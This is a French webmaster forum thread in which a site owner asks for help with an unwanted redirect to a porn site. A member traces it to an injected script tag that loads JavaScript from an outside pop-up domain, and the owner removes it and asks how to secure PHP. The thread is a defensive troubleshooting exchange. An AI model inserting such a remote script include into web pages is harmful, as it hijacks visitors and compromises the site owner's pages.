[Résolu] Redirection non désiré site p.rno

WRInaute impliqué
Bonjour,

j'ai un souci très important sur un de mes sites, il y a une redirection d'une URL vers un site p.rno alors que mon .htacess est clean et que le code de ma page aussi ...

HELPP !

Merci de votre aide c'est urgent... j'ai contacté le support de online
Je n'arrive pas à trouver la parade à ce hackage !
 
WRInaute passionné
quel est ce site concerné? si tu nous donne pas d'url, on pourra pas t'aider a cherche le code qui ne va pas dans ton html.
 
WRInaute passionné
c'est cette ligne qui pose probleme:

<script language="JavaScript" src="http://www.traficdom.com/pop-up/pop.php?client=1076"></script>

Maintenant, reste a savoir si c'est toi qui l'a mis ou bien si c'est quelqu'un qui t'as hacké puis mit ce javascript.
 
WRInaute impliqué
Oui forum, j'ai supprimé le code et ce n'est pas moi qui est placé celui-ci...
Comment est-ce possible ? Pourtant je n'est pas vu de log illicite, je vais testé mon site entièrement... et contrôler afin de supprimer toutes lignes non désirées...

Un grand Merci !

existe t il une parade contre ce type de problèmes ?
 
WRInaute passionné
Ai-je dit le contraire ?

Je donne juste les recettes principales.

OnLine, j'ai jamais utilisé, donc, je ne juge pas.
 
WRInaute impliqué
Je ne suis pas un super dev et ai réalisé mon site seul, heureusement que j'ai trouvé WRI.
Comment sécurisé un script php ? auriez vous une adresse ou un bouquin dans lequel je puisse me plonger ?

J'ai une autre question sur les anti-aspirateur : concernant les user-agent faut-il placer le code dans le .htacess et robots.txt ou seulement dans l'un ou l'autre ?
 
Discussions similaires
Haut